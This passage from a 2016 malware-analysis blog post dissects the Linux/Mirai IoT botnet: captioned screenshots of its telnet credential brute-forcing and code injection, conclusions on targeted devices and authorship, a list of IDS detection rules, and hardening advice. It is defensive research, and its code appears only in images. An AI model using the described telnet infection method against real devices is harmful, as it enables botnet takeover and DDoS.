<a href="https://lh3.googleusercontent.com/B8xdB0fwA4z1BDkxTsnGQ9cEB2r3KzxC6PnOlIQLQhk7B5IPO1fS902-Ab84tu55YRKEh8Yturbfdw=w1109-h624-no"><img src="https://lh3.googleusercontent.com/B8xdB0fwA4z1BDkxTsnGQ9cEB2r3KzxC6PnOlIQLQhk7B5IPO1fS902-Ab84tu55YRKEh8Yturbfdw=w555-h555-no"></a>

<p>The password request of the telnet login grepped:<br>
<a href="https://lh3.googleusercontent.com/icbb05e4_t0YvCyyQ463ziHXT31363-FgJq2zaVXjsAnSdBhMN0h97wnB9Y6DSyV_EDNV6GKDb7EZQ=w1261-h381-no"><img src="https://lh3.googleusercontent.com/icbb05e4_t0YvCyyQ463ziHXT31363-FgJq2zaVXjsAnSdBhMN0h97wnB9Y6DSyV_EDNV6GKDb7EZQ=w555-h555-no"></a>

<p>How the user & password is sent, one at the time..<br>
<a href="https://lh3.googleusercontent.com/WOR1qSLRUAGRP8yRKnYrrshfvPpay3ZdhsKbjizICVraEeoI89CisWijzr0Tk0wtPXt--9QfH5R6Ng=w1268-h566-no"><img src="https://lh3.googleusercontent.com/WOR1qSLRUAGRP8yRKnYrrshfvPpay3ZdhsKbjizICVraEeoI89CisWijzr0Tk0wtPXt--9QfH5R6Ng=w555-h555-no"></a>

<p>Attempt to gain the shell...studied from several collected bins<br>
<a href="https://lh3.googleusercontent.com/fL1OEYU_GsUsrOLWf0Ij8OfGcvx1wvPMnA_rF9XZYq_0cPtsM-4IZHFquxXfu3LrrZayd9TcPyISMA=w964-h245-no"><img src="https://lh3.googleusercontent.com/fL1OEYU_GsUsrOLWf0Ij8OfGcvx1wvPMnA_rF9XZYq_0cPtsM-4IZHFquxXfu3LrrZayd9TcPyISMA=w555-h555-no"></a>

<p>How the injected code is formed and sent...in rough code.<br>
<a href="https://lh3.googleusercontent.com/Fg3wd8dZbDzlSQ-k2xUk0WF1MVbQEXNTNHeLW9FOkfE1cuirrwsponw_wU3m15FFSsm6A-qbyt9HRA=w991-h288-no"><img src="https://lh3.googleusercontent.com/Fg3wd8dZbDzlSQ-k2xUk0WF1MVbQEXNTNHeLW9FOkfE1cuirrwsponw_wU3m15FFSsm6A-qbyt9HRA=w555-h555-no"></a><br>
This will be followed by the fetch malware command described in the <b>telnet attack protocol section</b>.

<p>If you see the above telnet infection generated reversed codes of <b>Linux/Mirai</b>, except for the usage of encoded strings and some additional/modification in injected telnet commands, it is reminding us for the previous known malware threat that aimed telnet and IoT/routers created by the skiddos we posted before. They don't (or maybe just can't) do much modification for the telnet scanner part.

<p>Despite similarity in the telnet infection, there are some interesting functions can be seen in the malware attack action that's not found in the previous threat, please take a rain check for those, for the current security reason.

<p>About further information on the telnet scannning research from the overall infected IoT device I can recommend you a very good report on telnet honeypot written by <b><i>Mr. Bedřich Košata</i></b> in <b>CZ.NIC</b> [<a href="http://blog.nic.cz/2016/09/01/telnet-stale-zije-alespon-na-chytrych-zarizenich/">link</a>] <br>
<a href="https://lh3.googleusercontent.com/xXktdl5dTkU9h8mLIBkyABr-pm3ABXJ7FRmD2wbtOuLnZOJ0Mp2PXRcN6-VtlRtV-RksI5dFtyJNZA=w853-h399-no"><img src="https://lh3.googleusercontent.com/xXktdl5dTkU9h8mLIBkyABr-pm3ABXJ7FRmD2wbtOuLnZOJ0Mp2PXRcN6-VtlRtV-RksI5dFtyJNZA=w555-h399-no"></a>

<p><b>Notes for skeleton reversed code:</b>

<p>The thing about reverse engineering is, you always can sense same stuff coded from someone or from the threat you follow. The generated code is not 100% same as the original source used, but it is enough to give is idea about how it works in more details and how it was coded. In this reversing I am using the <strike>one </strike> several ARM samples in 32bit as main reference, which is influencing the distortion in code generated (to be more using more variables and registers than Intel). I will brush-up these codes in my spare time.

<p><h2>The conclusion</h2>

<p>
<li><b>ELF Linux/Mirai</b> is the next generation of what they called it as "GayFgt/LizKebab/Torlus" or what we call it as "Bash0day, Bashdoor, or Bashlite" in the past. Which is desigend to be more sophisticated in aiming Linux boxes in internet for the botnet purpose (obviously for the DDoS attack cannons).
<li>This malware is designed scan the Telnet service running device and to own them, the owned/infected nodes are used for the cushion for further hacks. By product types, <b>ELF Linux/Mirai</b> is targeting DVR (hint /dvrHelper), WebIP Camera on busybox, other busybox powered Linux IoT boxes, and unattended Linux servers.
<li>The only significant addition is the stripping combined with encoded strings, thus added with busybox/watchdog delay, with other diversion in confusing the traffic filtration.
<li>The delay in activation of the malware and the CNC different port used is not changing the basic of communication protocol of what previous malware has coded with, the malware is depending by the remote access to operate further.
<li>The same group of <i>skiddo actors</i> who use Torlus or GayFgt are the one who responsible for this malware, facts are supporting this assumption with the same attack M.O (via telnet service and telnet scanners), youth hacktivism involved, same trace of coding style, infection style via <b>/dev</b> with deletion, and so on. It's too obvious. Not necessarily from the same coder but the GayFgt/Torlus shared code was re-used.
<li>Linux with architecture x86-32 is not their priority, this is why I don't see much of it but focus on samples that are really hitting the devices (mostly are ARM samples), the other is fetched from infection data or by tracking back to its sources..
<li>The traffic filtration for this threat is provided thoroughly by IDS/IPS filtration by ET Labs good folks [<a href="https://twitter.com/ET_Labs">link</a>], kudos hard working engineers to share the OPEN rules to filter this planet from this threat attacks. If your traffic filtration showed the below indicators, please make sure that you have no open telnet service to be aimed by the attackers.
<pre class="brush: asm">
Open rules:
  2023016 - ET TELNET SUSPICIOUS Path to BusyBox
  2023017 - ET TELNET SUSPICIOUS busybox shell
  2023018 - ET TELNET SUSPICIOUS busybox enable
  2023019 - ET TELNET busybox MIRAI hackers - Possible Brute Force Attack</pre>
<li>Mr. Johnny Vestergaard from HoneyNet Project Norwegian Chapter is releasing report about the recent attempt to hack his honeypots, and Linux/Mirai attacks were recorded in the same period [<a href="http://www.honeynet.org/node/1328">link</a>]
<li>Ah, one last thing... We <b>still have a better</b> KungFu, kiddos! :)<br>

<p><center><img src="https://lh3.googleusercontent.com/-_X7h2pMQdrU/VexDK6gC-iI/AAAAAAAATJQ/EuSfltvvjrsp8u7E6H7wRtGSx956QN0nACCo/s600-Ic42/KillBillJunior1.gif"></center>

<p><h2>Thank you and epilogue</h2>

<p>To all of the good sysadmin friends who uploaded us the samples. To engineer friends in ET Labs for the nice discussion about the threat. To security ring in MMD and my country who support to our ELF research. To the friends who contacted us directly and doing the very best cooperation to share and explain the threat..even-though it was hard to fetch some binaries from the memory but you all did it, we thank you for the hard work and support to make this analysis is possible. 

<p>I will continue the development of the "skeleton" tool to be more presentable and used by good people who want to dissect the unknown binary by this method. At the moment I will try to sync <i>the skeleton </i>development plan to be presented in public for the near future. Please contact @unixfreaxjp for the development matters.

<p>The moral of the story of this threat ; this is the example, on how a group of bad hackers can improve themselves.. if we let them still be freely doing their vandalism act out there. They keep on improving their threat and they have no care to aim anything that can be infected to expand their "botnets". Don't let the young age reducing our priority to stop the actors in the legal way, juveniles scheme in our culture are there for them to taste the consequences of what they do in the real life., let them taste it. If we don't stop them now..think about what they can do for 5 or 10 years from now to our internet. 

<p>To have Linux boxes in IoT to support our present life aspects is a bless in our technology era. But please be parallel to serve those boxes with more presentable security settings and don't let the authentication security for those running 365/24/7 OS becomes obsolete. Apply some securing method to secure it better too in user land UI i.e.: to force users to change the factory setting passwords BEFORE using them, or not to let telnetd runs openly by default, ask the users not to serve SSH in the default ports of possible, and these are really helping to reduce this threat hitting networks that is having much IoT running. Feel free to contact us in @malwaremustdie (twitter/direct message), or by comments to this post if you have an infection for this malware and look for advisory to dissect it, or to dump the sample from your busybox/IoT.

<p><h2>Thank you very much for the internet media awareness</h2>

<p>We, MMD thank our good friends in internet media for your fast awareness of this threat:<br>
1. Security Affairs (interview report) [<a href="http://securityaffairs.co/wordpress/50929/malware/linux-mirai-elf.html">link</a>]<br>
2. Security Week [<a href="http://www.securityweek.com/mirai-linux-backdoor-targets-iot-devices">link</a>]<br>
3. Softpedia [<a href="http://news.softpedia.com/news/mirai-ddos-trojan-is-the-next-big-threat-for-iot-devices-and-linux-servers-507964.shtml">link</a>]<br>
4. Open Source Forum .RU  [<a href="http://opensourceforu.com/2016/09/mirai-trojan-hit-linux-based-iot-devices/">link</a>]<br>
5. Bug Online .HR [<a href="http://www.bug.hr/vijesti/trojanac-mirai-opasnost-iot-uredaje-linux-pos/155499.aspx">link</a>]<br>
6. Muy Seguridad .ES [<a href="http://muyseguridad.net/2016/09/06/mirai-troyano-ddos-iot-linux/">link</a>]<br>
7. IPSInfo. RU  [<a href="https://ipsinfo.ru/news/security/ddos-troyan-mirai-ugrozhaet-ustroystvam-interneta-veshhey-i-serveram-na-linux-r259/">link</a>]<br>
8. Articulos relacionados con el mundo de la tecnologia .ES [<a href="http://www.clasesordenador.com/malware-elf-linux-mirai/index.html">link</a>]<br>
9. 甄选微信朋友圈热门文章_微信热文 .CN [<a href="http://www.wxrw123.com/jike/20160907/2753199.html">link</a>]<br>
10. Info Security Magazine .NL [<a href="http://infosecuritymagazine.nl/2016/09/07/nieuwe-malware-maakt-iot-apparaten-onderdeel-van-ddos-botnet/">link</a>] <br>
11. HelpNet Security [<a href="https://www.helpnetsecurity.com/2016/09/07/mirai-linux-trojan-iot-ddos-botnets/">link</a>] <br>
12. Best Security Search [<a href="http://bestsecuritysearch.com/mirai-linux-backdoor-attacks-iot-devices/">link</a>] <br>
13. 老蔡博客 | 专注云计算运维自动化 .CN [<a href="http://lcbk.net/5185.html">link</a>] <br>
14. IT Vesti (Bosnian) [<a href="http://www.itvesti.info/2016/09/trojanac-mirai-preti-iot-ureajima-i.html">link</a>] <br>
15. Heise Security .DE [<a href="http://www.heise.de/newsticker/meldung/Sicherheitsexperten-finden-IoT-Botnet-3317830.html">link</a>] <br>
16. Slashdot.org [<a href="https://it.slashdot.org/story/16/09/11/1155202/iot-devices-with-default-telnet-passwords-used-as-botnet">link</a>]
<br>
..and others who are not mentioned yet (I am sorry!)

<p>Stay safe folks!


<p>#MalwareMustDie!
<br>Reversed, analyzed and written by @unixfreaxjp [<a href="https://twitter.com/unixfreaxjp">link</a>], August 31st 2016.
<div style='clear: both;'></div>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'><span class='post-author vcard'>
Posted by
<span class='fn'>unixfreaxjp</span>
</span>
<span class='post-timestamp'>
at
<a class='timestamp-link' href='https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html' itemprop='url' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2016-09-01T11:34:00+09:00'>Thursday, September 01, 2016</abbr></a>
</span>
<span class='post-comment-link'>
</span>
<span class='post-icons'>
<span class='item-control blog-admin pid-1814417508'>
<a href='https://www.blogger.com/post-edit.g?blogID=8268358095554400245&postID=962351771858487603&from=pencil' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
</span>
</span>
<div class='post-share-buttons goog-inline-block'>
<a class='goog-inline-block share-button sb-email' href='https://www.blogger.com/share-post.g?blogID=8268358095554400245&postID=962351771858487603&target=email' target='_blank' title='Email This'><span class='share-button-link-text'>Email This</span></a><a class='goog-inline-block share-button sb-blog' href='https://www.blogger.com/share-post.g?blogID=8268358095554400245&postID=962351771858487603&target=blog' onclick='window.open(this.href, "_blank", "height=270,width=475"); return false;' target='_blank' title='BlogThis!'><span class='share-button-link-text'>BlogThis!</span></a><a class='goog-inline-block share-button sb-twitter' href='https://www.blogger.com/share-post.g?blogID=8268358095554400245&postID=962351771858487603&target=twitter' target='_blank' title='Share to Twitter'><span class='share-button-link-text'>Share to Twitter</span></a><a class='goog-inline-block share-button sb-facebook' href='https://www.blogger.com/share-post.g?blogID=8268358095554400245&postID=962351771858487603&target=facebook' onclick='window.open(this.href, "_blank", "height=430,width=640"); return false;' target='_blank' title='Share to Facebook'><span class='share-button-link-text'>Share to Facebook</span></a><a class='goog-inline-block share-button sb-pinterest' href='https://www.blogger.com/share-post.g?blogID=8268358095554400245&postID=962351771858487603&target=pinterest' target='_blank' title='Share to Pinterest'><span class='share-button-link-text'>Share to Pinterest</span></a>
</div>
</div>
<div class='post-footer-line post-footer-line-2'><span class='post-labels'>
</span>
</div>
<div class='post-footer-line post-footer-line-3'><span class='post-location'>
</span>
</div>
</div>
</div>
<div class='comments' id='comments'>
<a name='comments'></a>
</div>
</div>

        </div></div>
      
</div>
<div class='blog-pager' id='blog-pager'>
<span id='blog-pager-newer-link'>
<a class='blog-pager-newer-link' href='https://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html' id='Blog1_blog-pager-newer-link' title='Newer Post'>Newer Post</a>
</span>
<span id='blog-pager-older-link'>
<a class='blog-pager-older-link' href='https://blog.malwaremustdie.org/2016/08/mmd-0054-2016-pnscan-elf-worm-that.html' id='Blog1_blog-pager-older-link' title='Older Post'>Older Post</a>
</span>
<a class='home-link' href='https://blog.malwaremustdie.org/'>Home</a>
</div>
<div class='clear'></div>
<div class='post-feeds'>
</div>
</div></div>
</div>
</div>
<div class='column-left-outer'>
<div class='column-left-inner'>
<aside>
</aside>
</div>
</div>
<div class='column-right-outer'>
<div class='column-right-inner'>
<aside>
<div class='sidebar section' id='sidebar-right-1'><div class='widget HTML' data-version='1' id='HTML1'>
<h2 class='title'>About #MalwareMustDie!</h2>
<div class='widget-content'>
Launched in August 2012, MalwareMustDie(or MMD), is a registered <span style="font-weight:bold;">Non-profit Whitehat Organization</span>, as a Blue-Teaming media  to form work-flow activities to reduce malware in the internet <a href="https://en.wikipedia.org/wiki/MalwareMustDie">..[Read More]</a>
</div>
<div class='clear'></div>
</div><div class='widget BlogSearch' data-version='1' id='BlogSearch1'>
<h2 class='title'>Search keyword</h2>
<div class='widget-content'>
<div id='BlogSearch1_form'>
<form action='https://blog.malwaremustdie.org/search' class='gsc-search-box' target='_top'>
<table cellpadding='0' cellspacing='0' class='gsc-search-box'>
<tbody>
<tr>
<td class='gsc-input'>
<input autocomplete='off' class='gsc-input' name='q' size='10' title='search' type='text' value=''/>
</td>
<td class='gsc-search-button'>
<input class='gsc-search-button' title='search' type='submit' value='Search'/>
</td>
</tr>
</tbody>
</table>
</form>
</div>
</div>
<div class='clear'></div>
</div><div class='widget LinkList' data-version='1' id='LinkList1'>
<h2>Links</h2>
<div class='widget-content'>
<ul>
<li><a href='https://blog.malwaremustdie.org/feeds/posts/default?alt=rss'>RSS Feed</a></li>
<li><a href='https://www.malwaremustdie.org/'>Home Page</a></li>
<li><a href='https://blog.malwaremustdie.org/p/send-sample.html'>Send Sample</a></li>
<li><a href='https://www.google.com/search?q=malwaremustdie&tbm=nws&start=0'>News Search</a></li>
<li><a href='https://www.google.com/search?q=malwaremustdie&newwindow=1&client=firefox-b&biw=928&bih=462&source=lnt&tbs=cdr%3A1%2Ccd_min%3A7%2F1%2F2012%2Ccd_max%3A6%2F10%2F2016&tbm=#q=malwaremustdie&newwindow=1&tbs=cdr:1,cd_min:7/1/2012,cd_max:6/10/2016,sbd:1&start=10'>Web Search</a></li>
<li><a href='https://blog.malwaremustdie.org/p/linux-malware-research-list-updated.html'>Linux Malware</a></li>
<li><a href='https://unixfreaxjp.github.io/malwaremustdie/'>Github Repository</a></li>
<li><a href='https://www.youtube.com/playlist?list=PLSe6fLFf1YDX-2sog70220BchQmhVqQ75'>Video News, Demo, Reports</a></li>
<li><a href='https://malwared.malwaremustdie.org/'>"Malwared" Blacklist/Tracker</a></li>
<li><a href='https://blog.malwaremustdie.org/p/the-mmds-tango-down-project-archive.html'>"Tango down!" project (Archive)</a></li>
<li><a href='https://blog.malwaremustdie.org/p/the-rule-to-share-malicious-codes-we.html'>Disclaimer & Sharing Guide</a></li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget FeaturedPost' data-version='1' id='FeaturedPost1'>
<h2 class='title'>Recommended reading</h2>
<div class='post-summary'>
<h3><a href='https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html'>MMD-0065-2020 - Linux/Mirai-Fbot&#39;s new encryption explained</a></h3>
<p>
 Prologue   [For the most recent information of this threat please follow this ==&gt; link ]   I setup a local brand new ARM base router I b...
</p>
<img class='image' src='https://lh3.googleusercontent.com/58YEFVF-KZsSkmn8kvB8Tgth6VmcLHujsJCXpyic5GrXNHLR9TYqkJpymvzGv2tpMNlN6vdIojrhzoRkYwRg5PLuj7Yj03fdPac-CJUEVSyFeBd1TX52UpHabUOkuaRiBjgiqTrqiW8=w300-h1864-no'/>
</div>
<style type='text/css'>
    .image {
      width: 100%;
    }
  </style>
<div class='clear'></div>
</div><div class='widget LinkList' data-version='1' id='LinkList2'>
<h2>Malware Analysis / Threat Reports (Indexed)</h2>
<div class='widget-content'>
<ul>
<li><a href='https://blog.malwaremustdie.org/2021/03/mmd-067-2021-recent-talks-on-linux.html'>MMD-0067-2021 - Recent talks on Linux process injection and shellcode analysis series (ROOTCON-2020, R2CON-2020 ++)</a></li>
<li><a href='https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html'>MMD-0066-2020 - Linux/Mirai-Fbot - A re-emerged IoT threat </a></li>
<li><a href='https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html'>MMD-0065-2020 - Linux/Mirai-Fbot's new encryption explained</a></li>
<li><a href='https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html'>MMD-0064-2019 - Linux/AirDropBot</a></li>
<li><a href='https://blog.malwaremustdie.org/2019/09/mmd-0063-2019-summarize-report-of-three.html'>MMD-0063-2019 - Summary of three years research (Sept 2016-Sept 2019)</a></li>
<li><a href='https://blog.malwaremustdie.org/2017/03/mmd-0062-2017-credential-harvesting-by.html'>MMD-0062-2017 - IoT/Studels SSH-TCP Forward Threat</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/12/mmd-0061-2016-energymech-28-overkill-mod.html'>MMD-0061-2016 - EnergyMech 2.8 overkill mod</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/10/mmd-0060-2016-linuxudpfker-and-chinaz.html'>MMD-0060-2016 - Linux/UDPfker and ChinaZ threat today</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/10/mmd-0059-2016-linuxirctelnet-new-ddos.html'>MMD-0059-2016 - Linux/IRCTelnet (new Aidra)</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/10/mmd-0058-2016-elf-linuxnyadrop.html'>MMD-0058-2016 - Linux/NyaDrop - MIPS IoT bad news</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html'>MMD-0057-2016 - Linux/LuaBot - IoT botnet as service</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html'>MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/08/mmd-0054-2016-pnscan-elf-worm-that.html'>MMD-0055-2016 - Linux/PnScan ; A worm that still circles around</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/06/mmd-0054-2016-atmos-botnet-and-facts.html'>MMD-0054-2016 - ATMOS botnet facts you should know</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/04/mmd-0053-2016-bit-about-elfstd-irc-bot.html'>MMD-0053-2016 - Linux/STD IRC Botnet: x00's CBack aka xxx.pokemon.inc</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html'>MMD-0052-2016 - Overview of Overall "SkidDDoS" Linux Botnet</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/02/mmd-0051-2016-debungking-tiny-elf.html'>MMD-0051-2016 - Debunking a Tiny Shellhock's ELF backdoor</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html'>MMD-0050-2016 - Linux/Torte infection (in Wordpress)</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/01/mmd-0049-2016-case-of-java-trojan.html'>MMD-0049-2016 - Java Trojan Downloader/RCE) for minerd</a></li>
<li><a href='https://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html'>MMD-0048-2016 - DDOS.TF = ELF & Win32 DDoS service with ASP + PHP/MySQL MOF webshells</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/12/mmd-0047-2015-sshv-ssh-bruter-elf.html'>MMD-0047-2015 - SSHV: SSH bruter Linux botnet w/hidden process rootkit</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/12/mmd-0046-2015-kelihos-cnc-activity-on.html'>MMD-0046-2015 - Kelihos 10 nodes C2 / CNC on NJIIX (US) and its actor(Severa)</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/12/mmd-0045-2015-kdefend-new-elf-threat.html'>MMD-0045-2015 - Linux/KDefend: a new China origin Linux threat w/disclaimer</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/11/mmd-0044-2015-source-code-disclosure.html'>MMD-0044-2015 - Code disclosure of SkiDDoS threat</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/09/mmd-0042-2015-polymorphic-in-elf.html'>MMD-0043-2015 - Linux/Xor.DDOS Polymorphic feature</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/09/mmd-0042-2015-hunting-mr-black-ids-via.html'>MMD-0042-2015 - Geting to Linux/Mr.Black actor via Zegost </a></li>
<li><a href='https://blog.malwaremustdie.org/2015/09/mmd-0041-2015-reversing-pe-mail-grabber.html'>MMD-0041-2015 - PE Mail-grabber Spambot & its C99 WebShell</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/08/mmd-0039-2015-learning-about-vbe.html'>MMD-0040-2015 - VBE Obfuscation & AutoIt Banco Trojan</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html'>MMD-0039-2015 - ChinaZ  Linux/BillGates.Lite Edition</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/08/mmd-0037-2015-chinaz-and-ddos123xyz.html'>MMD-0038-2015 - ChinaZ's Ddos123.xyz</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html'>MMD-0037-2015 - Shellshock & Linux/XOR.DDoS C2</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/07/mmd-0036-2015-kins-or-zeusvm-v2000.html'>MMD-0036-2015 - KINS (ZeusVM)v2.0.0. builder & panel leaks</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/06/mmd-0035-2015-iptablex-or-iptables-on.html'>MMD-0035-2015 - Linux/.IptabLex or .IptabLes on Shellshock(by: ChinaZ)</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/06/mmd-0034-2015-new-elf.html'>MMD-0034-2015 - Linux/DES.Downloader on Elasticsearch</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html'>MMD-0033-2015 - Linux/XorDDoS case CNC:HOSTASA.ORG</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html'>MMD-0032-2015 - The ELF ChinaZ "reloaded"</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/04/mmd-0031-2015-what-is-netwire-rat.html'>MMD-0031-2015 - What is NetWire (multi platform) RAT</a></li>
<li><a href='https://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html'>MMD-0030-2015 - New malware on Shellshock: Linux/ChinaZ</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/10/mmd-0029-2015-warning-of-mayhem.html'>MMD-0029-2014 - Warning of Linux/Mayhem attack in Shellshock</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html'>MMD-0028-2014 - Linux/XOR.DDoS</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html'>MMD-0027-2014 - Linux/Bashdoor(GafGyt) & Small ELF Backdoor at shellshock</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/09/reversing-arm-architecture-elf-elknot.html'>MMD-0026-2014 - Linux/AES.DDoS: Router Malware</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/06/mmd-0025-2014-itw-infection-of-elf.html'>MMD-0025-2014 - Linux/.IptabLex or .IptabLes - China/PRC origin DDoS bot</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/06/recent-incident-report-of-linux-elf.html'>MMD-0024-2014 - Incident Report of Linux/Mayhem (LD_PRELOAD libworker.so)</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/05/a-payback-to-ssh-bruting-crooks.html'>MMD-0023-2014 - Linux/pscan & Linux/sshscan: SSH bruter malware</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/05/threat-analysis-zendran-elf-ddos-scheme.html'>MMD-0022-2014 - Zendran, multi-arch Linux/Llightaidra - Part 1: background, installation, reversing & C2 access</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html'>MMD-0021-2014 - Linux/Elknot: China's origin ELF DDoS+backdoor</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html'>MMD-0020-2014 - Analysis of Linux/Mayhem infection: A shared libs ELF</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/04/when-hacker-gets-hacked-disclosure.html'>MMD-0019-2014 - "Xakep.biz" evil tools</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/04/upatre-downloading-gmo-is-back-to-ssl.html'>MMD-0018-2014 - Analysis note: "Upatre" is back to SSL? </a></li>
<li><a href='https://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html'>MMD-0017-2014 - A post to sting Zeus P2P/Gameover</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/02/cyber-intelligence-jackpos-behind-screen.html'>MMD-0016-2014 - The JackPOS Behind the Screen</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/02/one-upn-time-with-american-express.html'>MMD-0015-2014 - One upon the time with Phishing Session..</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/01/threat-intelligence-new-locker-prison.html'>MMD-0014-2014 - New Locker: Prison Locker (aka: Power Locker)</a></li>
<li><a href='https://blog.malwaremustdie.org/2014/01/shadow-logger-new-fud-keylogger-on-mmd.html'>MMD-0013-2014 - "Shadow Logger" - .NET's FUD Keylogger</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/12/arp-spoofing-malware-infection-project.html'>MMD-0012-2013 - ARP Spoofing Malware</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/12/lets-be-more-serious-about-dns-amp-elf.html'>MMD-0011-2013 - Linux/Elknot - Let's be more serious about (mitigating) DNS Amp</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/11/more-wordpress-hack-case-sites.html'>MMD-0010-2013 - Wordpress Hack Case: Site's Credential Stealer</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/11/runforrestrun-dga-is-alive-at.html'>MMD-0009-2013 - JS/RunForrestRun DGA "Comeback" with new obfuscation</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/10/a-disclosure-of-whats-behind-w00tw00t.html'>MMD-0008-2013 - What's Behind the #w00tw00t (PHP) Attack</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/10/kins-source-code-for-view-download.html'>MMD-0007-2013 - KINS? No! PowerZeuS, yes! </a></li>
<li><a href='https://blog.malwaremustdie.org/2013/09/302-redirector-new-cushion-attempt-to.html'>MMD-0006-2013 - Rogue 302-Redirector "Cushion Attack"</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/09/how-greedy-cyber-scums-are-leaked-plan.html'>MMD-0005-2013 - A Leaked Malvertisement, Cutwail+BHEK & Triple Payloads of "Syria Campaign"</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/08/you-hacked-we-cracked-youre-doomed-ir.html'>MMD-0004-2013 - "You hacked.. we cracked" - "WP Super Cache" & Glazunov EK</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/07/the-come-back-of-ru-runforrestruns-dga.html'>MMD-0003-2013 - First "comeback" of the .RU RunForrestRun's DGA</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/07/how-bad-cutwail-and-other-spambot-can.html'>MMD-0002-2013 - How Cutwail and other SpamBot can fool (spoof) us?</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/07/proof-of-concept-of-cookiebomb-attack.html'>MMD-0001-2013 - Proof of Concept of "CookieBomb" code injection attack</a></li>
<li><a href='https://blog.malwaremustdie.org/2013/06/advisory-on-pleskapache-remote-code.html'>MMD-0000-2013 - Malware Infection Alert on Plesk/Apache Remote Code Execution zeroday</a></li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget LinkList' data-version='1' id='LinkList3'>
<h2>Presentation and Special Threat Reports</h2>
<div class='widget-content'>
<ul>
<li><a href='https://blog.malwaremustdie.org/2021/03/mmd-067-2021-recent-talks-on-linux.html#rootcon2020'>ROOTCON 2020 - Deeper diving into shellcode (advanced users)</a></li>
<li><a href='https://blog.malwaremustdie.org/2021/03/mmd-067-2021-recent-talks-on-linux.html#r2con2020'>R2CON 2020 - So you don't like shellcode too? (for r2 RE beginners)</a></li>
<li><a href='https://blog.malwaremustdie.org/2019/10/more-about-my-2019hacklu-keynote-talk.html'>HACK.LU 2019 Keynote talk: "Fileless Malware Infection and Linux Process Injection"</a></li>
<li><a href='https://blog.malwaremustdie.org/p/new-video-of-this-talk-has-just-been.html'>R2CON 2018 talk of: "Unpacking the non-unpackable ELF malware"</a></li>
